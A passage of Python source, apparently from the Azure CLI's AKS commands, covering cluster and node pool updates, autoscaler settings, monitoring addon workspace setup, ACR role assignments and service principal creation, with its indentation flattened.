load_balancer_outbound_ports,
load_balancer_idle_timeout)
if (update_autoscaler != 1 and not update_lb_profile and
not attach_acr and
not detach_acr and
api_server_authorized_ip_ranges is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--load-balancer-outbound-ports" or '
'"--load-balancer-idle-timeout" or '
'"--attach-acr" or "--detach-acr" or '
'"--api-server-authorized-ip-ranges"')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use the "az aks nodepool" command '
'to update autoscaler settings per node pool.')
node_count = instance.agent_pool_profiles[0].count
_validate_autoscaler_update_counts(min_count, max_count, node_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
                           '<CLUSTER_NAME>-agentpool in the MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# pylint: disable=unused-argument,inconsistent-return-statements
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, control_plane_only=False,
no_wait=False, **kwargs):
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
    using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
    :param endpoint_type: The endpoint type to be used for an Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
    using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
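# Illustrative sketch (not called anywhere in this module): what _handle_addons_args
# produces for a typical addons string. cmd, subscription and resource group are only
# needed when the 'monitoring' addon must create a default workspace, so they are
# omitted here; this is an assumption-laden demo, not part of the original code.
def _handle_addons_args_example():
    profiles = _handle_addons_args(None, 'http_application_routing,kube-dashboard', None, None)
    assert profiles['httpApplicationRouting'].enabled
    assert profiles['kubeDashboard'].enabled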
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
    except Exception:  # noqa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
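    # Illustrative shape of the resulting default workspace resource ID for a cluster
    # whose resource group lives in eastus (the subscription ID below is a placeholder):
    #   /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/DefaultResourceGroup-EUS
    #   /providers/Microsoft.OperationalInsights/workspaces/DefaultWorkspace-00000000-0000-0000-0000-000000000000-EUS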
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
tags=None,
labels=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
mode=mode
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
_validate_autoscaler_update_counts(min_count, max_count, node_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate that --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
        # This reply_url is temporarily set since Azure needs one to create the AAD application.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
